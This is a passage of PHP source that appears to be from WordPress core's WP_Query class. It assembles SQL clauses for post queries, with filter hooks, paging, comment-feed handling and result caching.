$where .= " AND {$wpdb->posts}.post_author NOT IN ($author__not_in) ";
} elseif ( ! empty( $query_vars['author__in'] ) ) {
if ( is_array( $query_vars['author__in'] ) ) {
$query_vars['author__in'] = array_unique( array_map( 'absint', $query_vars['author__in'] ) );
sort( $query_vars['author__in'] );
}
$author__in = implode( ',', array_map( 'absint', array_unique( (array) $query_vars['author__in'] ) ) );
$where .= " AND {$wpdb->posts}.post_author IN ($author__in) ";
}
// Author stuff for nice URLs.
if ( '' !== $query_vars['author_name'] ) {
if ( str_contains( $query_vars['author_name'], '/' ) ) {
$query_vars['author_name'] = explode( '/', $query_vars['author_name'] );
if ( $query_vars['author_name'][ count( $query_vars['author_name'] ) - 1 ] ) {
$query_vars['author_name'] = $query_vars['author_name'][ count( $query_vars['author_name'] ) - 1 ]; // No trailing slash.
} else {
$query_vars['author_name'] = $query_vars['author_name'][ count( $query_vars['author_name'] ) - 2 ]; // There was a trailing slash.
}
}
$query_vars['author_name'] = sanitize_title_for_query( $query_vars['author_name'] );
$query_vars['author'] = get_user_by( 'slug', $query_vars['author_name'] );
if ( $query_vars['author'] ) {
$query_vars['author'] = $query_vars['author']->ID;
}
$whichauthor .= " AND ({$wpdb->posts}.post_author = " . absint( $query_vars['author'] ) . ')';
}
// Matching by comment count.
if ( isset( $query_vars['comment_count'] ) ) {
// Numeric comment count is converted to array format.
if ( is_numeric( $query_vars['comment_count'] ) ) {
$query_vars['comment_count'] = array(
'value' => (int) $query_vars['comment_count'],
);
}
if ( isset( $query_vars['comment_count']['value'] ) ) {
$query_vars['comment_count'] = array_merge(
array(
'compare' => '=',
),
$query_vars['comment_count']
);
// Fallback for invalid compare operators is '='.
$compare_operators = array( '=', '!=', '>', '>=', '<', '<=' );
if ( ! in_array( $query_vars['comment_count']['compare'], $compare_operators, true ) ) {
$query_vars['comment_count']['compare'] = '=';
}
$where .= $wpdb->prepare( " AND {$wpdb->posts}.comment_count {$query_vars['comment_count']['compare']} %d", $query_vars['comment_count']['value'] );
}
}
// MIME-Type stuff for attachment browsing.
if ( isset( $query_vars['post_mime_type'] ) && '' !== $query_vars['post_mime_type'] ) {
$whichmimetype = wp_post_mime_type_where( $query_vars['post_mime_type'], $wpdb->posts );
}
$where .= $search . $whichauthor . $whichmimetype;
if ( ! empty( $this->allow_query_attachment_by_filename ) ) {
$join .= " LEFT JOIN {$wpdb->postmeta} AS sq1 ON ( {$wpdb->posts}.ID = sq1.post_id AND sq1.meta_key = '_wp_attached_file' )";
}
if ( ! empty( $this->meta_query->queries ) ) {
$clauses = $this->meta_query->get_sql( 'post', $wpdb->posts, 'ID', $this );
$join .= $clauses['join'];
$where .= $clauses['where'];
}
$rand = ( isset( $query_vars['orderby'] ) && 'rand' === $query_vars['orderby'] );
if ( ! isset( $query_vars['order'] ) ) {
$query_vars['order'] = $rand ? '' : 'DESC';
} else {
$query_vars['order'] = $rand ? '' : $this->parse_order( $query_vars['order'] );
}
// These values of orderby should ignore the 'order' parameter.
$force_asc = array( 'post__in', 'post_name__in', 'post_parent__in' );
if ( isset( $query_vars['orderby'] ) && in_array( $query_vars['orderby'], $force_asc, true ) ) {
$query_vars['order'] = '';
}
// Order by.
if ( empty( $query_vars['orderby'] ) ) {
/*
* Boolean false or empty array blanks out ORDER BY,
* while leaving the value unset or otherwise empty sets the default.
*/
if ( isset( $query_vars['orderby'] ) && ( is_array( $query_vars['orderby'] ) || false === $query_vars['orderby'] ) ) {
$orderby = '';
} else {
$orderby = "{$wpdb->posts}.post_date " . $query_vars['order'];
}
} elseif ( 'none' === $query_vars['orderby'] ) {
$orderby = '';
} else {
$orderby_array = array();
if ( is_array( $query_vars['orderby'] ) ) {
foreach ( $query_vars['orderby'] as $_orderby => $order ) {
$orderby = addslashes_gpc( urldecode( $_orderby ) );
$parsed = $this->parse_orderby( $orderby );
if ( ! $parsed ) {
continue;
}
$orderby_array[] = $parsed . ' ' . $this->parse_order( $order );
}
$orderby = implode( ', ', $orderby_array );
} else {
$query_vars['orderby'] = urldecode( $query_vars['orderby'] );
$query_vars['orderby'] = addslashes_gpc( $query_vars['orderby'] );
foreach ( explode( ' ', $query_vars['orderby'] ) as $i => $orderby ) {
$parsed = $this->parse_orderby( $orderby );
// Only allow certain values for safety.
if ( ! $parsed ) {
continue;
}
$orderby_array[] = $parsed;
}
$orderby = implode( ' ' . $query_vars['order'] . ', ', $orderby_array );
if ( empty( $orderby ) ) {
$orderby = "{$wpdb->posts}.post_date " . $query_vars['order'];
} elseif ( ! empty( $query_vars['order'] ) ) {
$orderby .= " {$query_vars['order']}";
}
}
}
// Order search results by relevance only when another "orderby" is not specified in the query.
if ( ! empty( $query_vars['s'] ) ) {
$search_orderby = '';
if ( ! empty( $query_vars['search_orderby_title'] ) && ( empty( $query_vars['orderby'] ) && ! $this->is_feed ) || ( isset( $query_vars['orderby'] ) && 'relevance' === $query_vars['orderby'] ) ) {
$search_orderby = $this->parse_search_order( $query_vars );
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the ORDER BY used when ordering search results.
*
* @since 3.7.0
*
* @param string $search_orderby The ORDER BY clause.
* @param WP_Query $query The current WP_Query instance.
*/
$search_orderby = apply_filters( 'posts_search_orderby', $search_orderby, $this );
}
if ( $search_orderby ) {
$orderby = $orderby ? $search_orderby . ', ' . $orderby : $search_orderby;
}
}
if ( is_array( $post_type ) && count( $post_type ) > 1 ) {
$post_type_cap = 'multiple_post_type';
} else {
if ( is_array( $post_type ) ) {
$post_type = reset( $post_type );
}
$post_type_object = get_post_type_object( $post_type );
if ( empty( $post_type_object ) ) {
$post_type_cap = $post_type;
}
}
if ( isset( $query_vars['post_password'] ) ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.post_password = %s", $query_vars['post_password'] );
if ( empty( $query_vars['perm'] ) ) {
$query_vars['perm'] = 'readable';
}
} elseif ( isset( $query_vars['has_password'] ) ) {
$where .= sprintf( " AND {$wpdb->posts}.post_password %s ''", $query_vars['has_password'] ? '!=' : '=' );
}
if ( ! empty( $query_vars['comment_status'] ) ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.comment_status = %s ", $query_vars['comment_status'] );
}
if ( ! empty( $query_vars['ping_status'] ) ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.ping_status = %s ", $query_vars['ping_status'] );
}
$skip_post_status = false;
if ( 'any' === $post_type ) {
$in_search_post_types = get_post_types( array( 'exclude_from_search' => false ) );
if ( empty( $in_search_post_types ) ) {
$post_type_where = ' AND 1=0 ';
$skip_post_status = true;
} else {
$post_type_where = " AND {$wpdb->posts}.post_type IN ('" . implode( "', '", array_map( 'esc_sql', $in_search_post_types ) ) . "')";
}
} elseif ( ! empty( $post_type ) && is_array( $post_type ) ) {
// Sort post types to ensure same cache key generation.
sort( $post_type );
$post_type_where = " AND {$wpdb->posts}.post_type IN ('" . implode( "', '", esc_sql( $post_type ) ) . "')";
} elseif ( ! empty( $post_type ) ) {
$post_type_where = $wpdb->prepare( " AND {$wpdb->posts}.post_type = %s", $post_type );
$post_type_object = get_post_type_object( $post_type );
} elseif ( $this->is_attachment ) {
$post_type_where = " AND {$wpdb->posts}.post_type = 'attachment'";
$post_type_object = get_post_type_object( 'attachment' );
} elseif ( $this->is_page ) {
$post_type_where = " AND {$wpdb->posts}.post_type = 'page'";
$post_type_object = get_post_type_object( 'page' );
} else {
$post_type_where = " AND {$wpdb->posts}.post_type = 'post'";
$post_type_object = get_post_type_object( 'post' );
}
$edit_cap = 'edit_post';
$read_cap = 'read_post';
if ( ! empty( $post_type_object ) ) {
$edit_others_cap = $post_type_object->cap->edit_others_posts;
$read_private_cap = $post_type_object->cap->read_private_posts;
} else {
$edit_others_cap = 'edit_others_' . $post_type_cap . 's';
$read_private_cap = 'read_private_' . $post_type_cap . 's';
}
$user_id = get_current_user_id();
$q_status = array();
if ( $skip_post_status ) {
$where .= $post_type_where;
} elseif ( ! empty( $query_vars['post_status'] ) ) {
$where .= $post_type_where;
$statuswheres = array();
$q_status = $query_vars['post_status'];
if ( ! is_array( $q_status ) ) {
$q_status = explode( ',', $q_status );
}
sort( $q_status );
$r_status = array();
$p_status = array();
$e_status = array();
if ( in_array( 'any', $q_status, true ) ) {
foreach ( get_post_stati( array( 'exclude_from_search' => true ) ) as $status ) {
if ( ! in_array( $status, $q_status, true ) ) {
$e_status[] = "{$wpdb->posts}.post_status <> '$status'";
}
}
} else {
foreach ( get_post_stati() as $status ) {
if ( in_array( $status, $q_status, true ) ) {
if ( 'private' === $status ) {
$p_status[] = "{$wpdb->posts}.post_status = '$status'";
} else {
$r_status[] = "{$wpdb->posts}.post_status = '$status'";
}
}
}
}
if ( empty( $query_vars['perm'] ) || 'readable' !== $query_vars['perm'] ) {
$r_status = array_merge( $r_status, $p_status );
unset( $p_status );
}
if ( ! empty( $e_status ) ) {
$statuswheres[] = '(' . implode( ' AND ', $e_status ) . ')';
}
if ( ! empty( $r_status ) ) {
if ( ! empty( $query_vars['perm'] ) && 'editable' === $query_vars['perm'] && ! current_user_can( $edit_others_cap ) ) {
$statuswheres[] = "({$wpdb->posts}.post_author = $user_id " . 'AND (' . implode( ' OR ', $r_status ) . '))';
} else {
$statuswheres[] = '(' . implode( ' OR ', $r_status ) . ')';
}
}
if ( ! empty( $p_status ) ) {
if ( ! empty( $query_vars['perm'] ) && 'readable' === $query_vars['perm'] && ! current_user_can( $read_private_cap ) ) {
$statuswheres[] = "({$wpdb->posts}.post_author = $user_id " . 'AND (' . implode( ' OR ', $p_status ) . '))';
} else {
$statuswheres[] = '(' . implode( ' OR ', $p_status ) . ')';
}
}
if ( $post_status_join ) {
$join .= " LEFT JOIN {$wpdb->posts} AS p2 ON ({$wpdb->posts}.post_parent = p2.ID) ";
foreach ( $statuswheres as $index => $statuswhere ) {
$statuswheres[ $index ] = "($statuswhere OR ({$wpdb->posts}.post_status = 'inherit' AND " . str_replace( $wpdb->posts, 'p2', $statuswhere ) . '))';
}
}
$where_status = implode( ' OR ', $statuswheres );
if ( ! empty( $where_status ) ) {
$where .= " AND ($where_status)";
}
} elseif ( ! $this->is_singular ) {
if ( 'any' === $post_type ) {
$queried_post_types = get_post_types( array( 'exclude_from_search' => false ) );
} elseif ( is_array( $post_type ) ) {
$queried_post_types = $post_type;
} elseif ( ! empty( $post_type ) ) {
$queried_post_types = array( $post_type );
} else {
$queried_post_types = array( 'post' );
}
if ( ! empty( $queried_post_types ) ) {
sort( $queried_post_types );
$status_type_clauses = array();
foreach ( $queried_post_types as $queried_post_type ) {
$queried_post_type_object = get_post_type_object( $queried_post_type );
$type_where = '(' . $wpdb->prepare( "{$wpdb->posts}.post_type = %s AND (", $queried_post_type );
// Public statuses.
$public_statuses = get_post_stati( array( 'public' => true ) );
$status_clauses = array();
foreach ( $public_statuses as $public_status ) {
$status_clauses[] = "{$wpdb->posts}.post_status = '$public_status'";
}
$type_where .= implode( ' OR ', $status_clauses );
// Add protected states that should show in the admin all list.
if ( $this->is_admin ) {
$admin_all_statuses = get_post_stati(
array(
'protected' => true,
'show_in_admin_all_list' => true,
)
);
foreach ( $admin_all_statuses as $admin_all_status ) {
$type_where .= " OR {$wpdb->posts}.post_status = '$admin_all_status'";
}
}
// Add private states that are visible to current user.
if ( is_user_logged_in() && $queried_post_type_object instanceof WP_Post_Type ) {
$read_private_cap = $queried_post_type_object->cap->read_private_posts;
$private_statuses = get_post_stati( array( 'private' => true ) );
foreach ( $private_statuses as $private_status ) {
$type_where .= current_user_can( $read_private_cap ) ? " \nOR {$wpdb->posts}.post_status = '$private_status'" : " \nOR ({$wpdb->posts}.post_author = $user_id AND {$wpdb->posts}.post_status = '$private_status')";
}
}
$type_where .= '))';
$status_type_clauses[] = $type_where;
}
if ( ! empty( $status_type_clauses ) ) {
$where .= ' AND (' . implode( ' OR ', $status_type_clauses ) . ')';
}
} else {
$where .= ' AND 1=0 ';
}
} else {
$where .= $post_type_where;
}
/*
* Apply filters on where and join prior to paging so that any
* manipulations to them are reflected in the paging by day queries.
*/
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the WHERE clause of the query.
*
* @since 1.5.0
*
* @param string $where The WHERE clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$where = apply_filters_ref_array( 'posts_where', array( $where, &$this ) );
/**
* Filters the JOIN clause of the query.
*
* @since 1.5.0
*
* @param string $join The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$join = apply_filters_ref_array( 'posts_join', array( $join, &$this ) );
}
// Paging.
if ( empty( $query_vars['nopaging'] ) && ! $this->is_singular ) {
$page = absint( $query_vars['paged'] );
if ( ! $page ) {
$page = 1;
}
// If 'offset' is provided, it takes precedence over 'paged'.
if ( isset( $query_vars['offset'] ) && is_numeric( $query_vars['offset'] ) ) {
$query_vars['offset'] = absint( $query_vars['offset'] );
$pgstrt = $query_vars['offset'] . ', ';
} else {
$pgstrt = absint( ( $page - 1 ) * $query_vars['posts_per_page'] ) . ', ';
}
$limits = 'LIMIT ' . $pgstrt . $query_vars['posts_per_page'];
}
// Comments feeds.
if ( $this->is_comment_feed && ! $this->is_singular ) {
if ( $this->is_archive || $this->is_search ) {
$cjoin = "JOIN {$wpdb->posts} ON ( {$wpdb->comments}.comment_post_ID = {$wpdb->posts}.ID ) $join ";
$cwhere = "WHERE comment_approved = '1' $where";
$cgroupby = "{$wpdb->comments}.comment_id";
} else { // Other non-singular, e.g. front.
$cjoin = "JOIN {$wpdb->posts} ON ( {$wpdb->comments}.comment_post_ID = {$wpdb->posts}.ID )";
$cwhere = "WHERE ( post_status = 'publish' OR ( post_status = 'inherit' AND post_type = 'attachment' ) ) AND comment_approved = '1'";
$cgroupby = '';
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the JOIN clause of the comments feed query before sending.
*
* @since 2.2.0
*
* @param string $cjoin The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$cjoin = apply_filters_ref_array( 'comment_feed_join', array( $cjoin, &$this ) );
/**
* Filters the WHERE clause of the comments feed query before sending.
*
* @since 2.2.0
*
* @param string $cwhere The WHERE clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$cwhere = apply_filters_ref_array( 'comment_feed_where', array( $cwhere, &$this ) );
/**
* Filters the GROUP BY clause of the comments feed query before sending.
*
* @since 2.2.0
*
* @param string $cgroupby The GROUP BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$cgroupby = apply_filters_ref_array( 'comment_feed_groupby', array( $cgroupby, &$this ) );
/**
* Filters the ORDER BY clause of the comments feed query before sending.
*
* @since 2.8.0
*
* @param string $corderby The ORDER BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$corderby = apply_filters_ref_array( 'comment_feed_orderby', array( 'comment_date_gmt DESC', &$this ) );
/**
* Filters the LIMIT clause of the comments feed query before sending.
*
* @since 2.8.0
*
* @param string $climits The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$climits = apply_filters_ref_array( 'comment_feed_limits', array( 'LIMIT ' . get_option( 'posts_per_rss' ), &$this ) );
}
$cgroupby = ( ! empty( $cgroupby ) ) ? 'GROUP BY ' . $cgroupby : '';
$corderby = ( ! empty( $corderby ) ) ? 'ORDER BY ' . $corderby : '';
$climits = ( ! empty( $climits ) ) ? $climits : '';
$comments_request = "SELECT $distinct {$wpdb->comments}.comment_ID FROM {$wpdb->comments} $cjoin $cwhere $cgroupby $corderby $climits";
$key = md5( $comments_request );
$last_changed = array(
wp_cache_get_last_changed( 'comment' ),
wp_cache_get_last_changed( 'posts' ),
);
$cache_key = "comment_feed:$key";
$comment_ids = wp_cache_get_salted( $cache_key, 'comment-queries', $last_changed );
if ( false === $comment_ids ) {
$comment_ids = $wpdb->get_col( $comments_request );
wp_cache_set_salted( $cache_key, $comment_ids, 'comment-queries', $last_changed );
}
_prime_comment_caches( $comment_ids );
// Convert to WP_Comment.
/** @var WP_Comment[] */
$this->comments = array_map( 'get_comment', $comment_ids );
$this->comment_count = count( $this->comments );
$post_ids = array();
foreach ( $this->comments as $comment ) {
$post_ids[] = (int) $comment->comment_post_ID;
}
$post_ids = implode( ',', $post_ids );
$join = '';
if ( $post_ids ) {
$where = "AND {$wpdb->posts}.ID IN ($post_ids) ";
} else {
$where = 'AND 0';
}
}
$pieces = array( 'where', 'groupby', 'join', 'orderby', 'distinct', 'fields', 'limits' );
/*
* Apply post-paging filters on where and join. Only plugins that
* manipulate paging queries should use these hooks.
*/
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the WHERE clause of the query.
*
* Specifically for manipulating paging queries.
*
* @since 1.5.0
*
* @param string $where The WHERE clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$where = apply_filters_ref_array( 'posts_where_paged', array( $where, &$this ) );
/**
* Filters the GROUP BY clause of the query.
*
* @since 2.0.0
*
* @param string $groupby The GROUP BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$groupby = apply_filters_ref_array( 'posts_groupby', array( $groupby, &$this ) );
/**
* Filters the JOIN clause of the query.
*
* Specifically for manipulating paging queries.
*
* @since 1.5.0
*
* @param string $join The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$join = apply_filters_ref_array( 'posts_join_paged', array( $join, &$this ) );
/**
* Filters the ORDER BY clause of the query.
*
* @since 1.5.1
*
* @param string $orderby The ORDER BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$orderby = apply_filters_ref_array( 'posts_orderby', array( $orderby, &$this ) );
/**
* Filters the DISTINCT clause of the query.
*
* @since 2.1.0
*
* @param string $distinct The DISTINCT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$distinct = apply_filters_ref_array( 'posts_distinct', array( $distinct, &$this ) );
/**
* Filters the LIMIT clause of the query.
*
* @since 2.1.0
*
* @param string $limits The LIMIT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$limits = apply_filters_ref_array( 'post_limits', array( $limits, &$this ) );
/**
* Filters the SELECT clause of the query.
*
* @since 2.1.0
*
* @param string $fields The SELECT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$fields = apply_filters_ref_array( 'posts_fields', array( $fields, &$this ) );
/**
* Filters all query clauses at once, for convenience.
*
* Covers the WHERE, GROUP BY, JOIN, ORDER BY, DISTINCT,
* fields (SELECT), and LIMIT clauses.
*
* @since 3.1.0
*
* @param string[] $clauses {
* Associative array of the clauses for the query.
*
* @type string $where The WHERE clause of the query.
* @type string $groupby The GROUP BY clause of the query.
* @type string $join The JOIN clause of the query.
* @type string $orderby The ORDER BY clause of the query.
* @type string $distinct The DISTINCT clause of the query.
* @type string $fields The SELECT clause of the query.
* @type string $limits The LIMIT clause of the query.
* }
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$clauses = (array) apply_filters_ref_array( 'posts_clauses', array( compact( $pieces ), &$this ) );
$where = isset( $clauses['where'] ) ? $clauses['where'] : '';
$groupby = isset( $clauses['groupby'] ) ? $clauses['groupby'] : '';
$join = isset( $clauses['join'] ) ? $clauses['join'] : '';
$orderby = isset( $clauses['orderby'] ) ? $clauses['orderby'] : '';
$distinct = isset( $clauses['distinct'] ) ? $clauses['distinct'] : '';
$fields = isset( $clauses['fields'] ) ? $clauses['fields'] : '';
$limits = isset( $clauses['limits'] ) ? $clauses['limits'] : '';
}
/**
* Fires to announce the query's current selection parameters.
*
* For use by caching plugins.
*
* @since 2.3.0
*
* @param string $selection The assembled selection query.
*/
do_action( 'posts_selection', $where . $groupby . $orderby . $limits . $join );
/*
* Filters again for the benefit of caching plugins.
* Regular plugins should use the hooks above.
*/
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the WHERE clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $where The WHERE clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$where = apply_filters_ref_array( 'posts_where_request', array( $where, &$this ) );
/**
* Filters the GROUP BY clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $groupby The GROUP BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$groupby = apply_filters_ref_array( 'posts_groupby_request', array( $groupby, &$this ) );
/**
* Filters the JOIN clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $join The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$join = apply_filters_ref_array( 'posts_join_request', array( $join, &$this ) );
/**
* Filters the ORDER BY clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $orderby The ORDER BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$orderby = apply_filters_ref_array( 'posts_orderby_request', array( $orderby, &$this ) );
/**
* Filters the DISTINCT clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $distinct The DISTINCT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$distinct = apply_filters_ref_array( 'posts_distinct_request', array( $distinct, &$this ) );
/**
* Filters the SELECT clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $fields The SELECT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$fields = apply_filters_ref_array( 'posts_fields_request', array( $fields, &$this ) );
/**
* Filters the LIMIT clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $limits The LIMIT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$limits = apply_filters_ref_array( 'post_limits_request', array( $limits, &$this ) );
/**
* Filters all query clauses at once, for convenience.
*
* For use by caching plugins.
*
* Covers the WHERE, GROUP BY, JOIN, ORDER BY, DISTINCT,
* fields (SELECT), and LIMIT clauses.
*
* @since 3.1.0
*
* @param string[] $clauses {
* Associative array of the clauses for the query.
*
* @type string $where The WHERE clause of the query.
* @type string $groupby The GROUP BY clause of the query.
* @type string $join The JOIN clause of the query.
* @type string $orderby The ORDER BY clause of the query.
* @type string $distinct The DISTINCT clause of the query.
* @type string $fields The SELECT clause of the query.
* @type string $limits The LIMIT clause of the query.
* }
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$clauses = (array) apply_filters_ref_array( 'posts_clauses_request', array( compact( $pieces ), &$this ) );
$where = isset( $clauses['where'] ) ? $clauses['where'] : '';
$groupby = isset( $clauses['groupby'] ) ? $clauses['groupby'] : '';
$join = isset( $clauses['join'] ) ? $clauses['join'] : '';
$orderby = isset( $clauses['orderby'] ) ? $clauses['orderby'] : '';
$distinct = isset( $clauses['distinct'] ) ? $clauses['distinct'] : '';
$fields = isset( $clauses['fields'] ) ? $clauses['fields'] : '';
$limits = isset( $clauses['limits'] ) ? $clauses['limits'] : '';
}
if ( ! empty( $groupby ) ) {
$groupby = 'GROUP BY ' . $groupby;
}
if ( ! empty( $orderby ) ) {
$orderby = 'ORDER BY ' . $orderby;
}
$found_rows = '';
if ( ! $query_vars['no_found_rows'] && ! empty( $limits ) ) {
$found_rows = 'SQL_CALC_FOUND_ROWS';
}
/*
* Beginning of the string is on a new line to prevent leading whitespace.
*
* The additional indentation of subsequent lines is to ensure the SQL
* queries are identical to those generated when splitting queries. This
* improves caching of the query by ensuring the same cache key is
* generated for the same database queries functionally.
*
* See https://core.trac.wordpress.org/ticket/56841.
* See https://github.com/WordPress/wordpress-develop/pull/6393#issuecomment-2088217429
*/
$old_request =
"SELECT $found_rows $distinct $fields
FROM {$wpdb->posts} $join
WHERE 1=1 $where
$groupby
$orderby
$limits";
$this->request = $old_request;
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the completed SQL query before sending.
*
* @since 2.0.0
*
* @param string $request The complete SQL query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->request = apply_filters_ref_array( 'posts_request', array( $this->request, &$this ) );
}
/**
* Filters the posts array before the query takes place.
*
* Return a non-null value to bypass WordPress' default post queries.
*
* Filtering functions that require pagination information are encouraged to set
* the `found_posts` and `max_num_pages` properties of the WP_Query object,
* passed to the filter by reference. If WP_Query does not perform a database
* query, it will not have enough information to generate these values itself.
*
* @since 4.6.0
*
* @param WP_Post[]|int[]|null $posts Return an array of post data to short-circuit WP's query,
* or null to allow WP to run its normal queries.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->posts = apply_filters_ref_array( 'posts_pre_query', array( null, &$this ) );
/*
* Ensure the ID database query is able to be cached.
*
* Random queries are expected to have unpredictable results and
* cannot be cached. Note the space before `RAND` in the string
* search, that to ensure against a collision with another
* function.
*
* If `$fields` has been modified by the `posts_fields`,
* `posts_fields_request`, `post_clauses` or `posts_clauses_request`
* filters, then caching is disabled to prevent caching collisions.
*/
$id_query_is_cacheable = ! str_contains( strtoupper( $orderby ), ' RAND(' );
$cacheable_field_values = array(
"{$wpdb->posts}.*",
"{$wpdb->posts}.ID, {$wpdb->posts}.post_parent",
"{$wpdb->posts}.ID",
);
if ( ! in_array( $fields, $cacheable_field_values, true ) ) {
$id_query_is_cacheable = false;
}
$last_changed = (array) wp_cache_get_last_changed( 'posts' );
if ( ! empty( $this->tax_query->queries ) ) {
$last_changed[] = wp_cache_get_last_changed( 'terms' );
}
if ( $query_vars['cache_results'] && $id_query_is_cacheable ) {
$new_request = str_replace( $fields, "{$wpdb->posts}.*", $this->request );
$cache_key = $this->generate_cache_key( $query_vars, $new_request );
$cache_found = false;
if ( null === $this->posts ) {
$cached_results = wp_cache_get_salted( $cache_key, 'post-queries', $last_changed );
if ( $cached_results ) {
$cache_found = true;
/** @var int[] */
$post_ids = array_map( 'intval', $cached_results['posts'] );
$this->post_count = count( $post_ids );
$this->found_posts = $cached_results['found_posts'];
$this->max_num_pages = $cached_results['max_num_pages'];
if ( 'ids' === $query_vars['fields'] ) {
$this->posts = $post_ids;
return $this->posts;
} elseif ( 'id=>parent' === $query_vars['fields'] ) {
_prime_post_parent_id_caches( $post_ids );
$post_parent_cache_keys = array();
foreach ( $post_ids as $post_id ) {
$post_parent_cache_keys[] = 'post_parent:' . (string) $post_id;
}
/** @var int[] */
$post_parents = wp_cache_get_multiple( $post_parent_cache_keys, 'posts' );
foreach ( $post_parents as $cache_key => $post_parent ) {
$obj = new stdClass();
$obj->ID = (int) str_replace( 'post_parent:', '', $cache_key );
$obj->post_parent = (int) $post_parent;
$this->posts[] = $obj;
}
return $post_parents;
} else {
_prime_post_caches( $post_ids, $query_vars['update_post_term_cache'], $query_vars['update_post_meta_cache'] );
/** @var WP_Post[] */
$this->posts = array_map( 'get_post', $post_ids );
}
}
}
}
if ( 'ids' === $query_vars['fields'] ) {
if ( null === $this->posts ) {
$this->posts = $wpdb->get_col( $this->request );
}
/** @var int[] */
$this->posts = array_map( 'intval', $this->posts );
$this->post_count = count( $this->posts );
$this->set_found_posts( $query_vars, $limits );
if ( $query_vars['cache_results'] && $id_query_is_cacheable ) {
$cache_value = array(
'posts' => $this->posts,
'found_posts' => $this->found_posts,
'max_num_pages' => $this->max_num_pages,
);
wp_cache_set_salted( $cache_key, $cache_value, 'post-queries', $last_changed );
}
return $this->posts;
}
if ( 'id=>parent' === $query_vars['fields'] ) {
if ( null === $this->posts ) {
$this->posts = $wpdb->get_results( $this->request );
}
$this->post_count = count( $this->posts );
$this->set_found_posts( $query_vars, $limits );
/** @var int[] */
$post_parents = array();
$post_ids = array();
$post_parents_cache = array();
foreach ( $this->posts as $key => $post ) {
$this->posts[ $key ]->ID = (int) $post->ID;
$this->posts[ $key ]->post_parent = (int) $post->post_parent;
$post_parents[ (int) $post->ID ] = (int) $post->post_parent;
$post_ids[] = (int) $post->ID;
$post_parents_cache[ 'post_parent:' . (string) $post->ID ] = (int) $post->post_parent;
}
// Prime post parent caches, so that on second run, there is not another database query.
wp_cache_add_multiple( $post_parents_cache, 'posts' );
if ( $query_vars['cache_results'] && $id_query_is_cacheable ) {
$cache_value = array(
'posts' => $post_ids,
'found_posts' => $this->found_posts,
'max_num_pages' => $this->max_num_pages,
);
wp_cache_set_salted( $cache_key, $cache_value, 'post-queries', $last_changed );
}
return $post_parents;
}
$is_unfiltered_query = $old_request === $this->request && "{$wpdb->posts}.*" === $fields;
if ( null === $this->posts ) {
$split_the_query = (
$is_unfiltered_query
&& (
wp_using_ext_object_cache()
|| ( ! empty( $limits ) && $query_vars['posts_per_page'] < 500 )
)
);
/**
* Filters whether to split the query.
*
* Splitting the query will cause it to fetch just the IDs of the found posts
* (and then individually fetch each post by ID), rather than fetching every
* complete row at once. One massive result vs. many small results.
*
* @since 3.4.0
* @since 6.6.0 Added the `$old_request` and `$clauses` parameters.
*
* @param bool $split_the_query Whether or not to split the query.
* @param WP_Query $query The WP_Query instance.
* @param string $old_request The complete SQL query before filtering.
* @param string[] $clauses {
* Associative array of the clauses for the query.
*
* @type string $where The WHERE clause of the query.
* @type string $groupby The GROUP BY clause of the query.
* @type string $join The JOIN clause of the query.
* @type string $orderby The ORDER BY clause of the query.
* @type string $distinct The DISTINCT clause of the query.
* @type string $fields The SELECT clause of the query.
* @type string $limits The LIMIT clause of the query.
* }
*/
$split_the_query = apply_filters( 'split_the_query', $split_the_query, $this, $old_request, compact( $pieces ) );
if ( $split_the_query ) {
// First get the IDs and then fill in the objects.
// Beginning of the string is on a new line to prevent leading whitespace. See https://core.trac.wordpress.org/ticket/56841.
$this->request =
"SELECT $found_rows $distinct {$wpdb->posts}.ID
FROM {$wpdb->posts} $join
WHERE 1=1 $where
$groupby
$orderby
$limits";
/**
* Filters the Post IDs SQL request before sending.
*
* @since 3.4.0
*
* @param string $request The post ID request.
* @param WP_Query $query The WP_Query instance.
*/
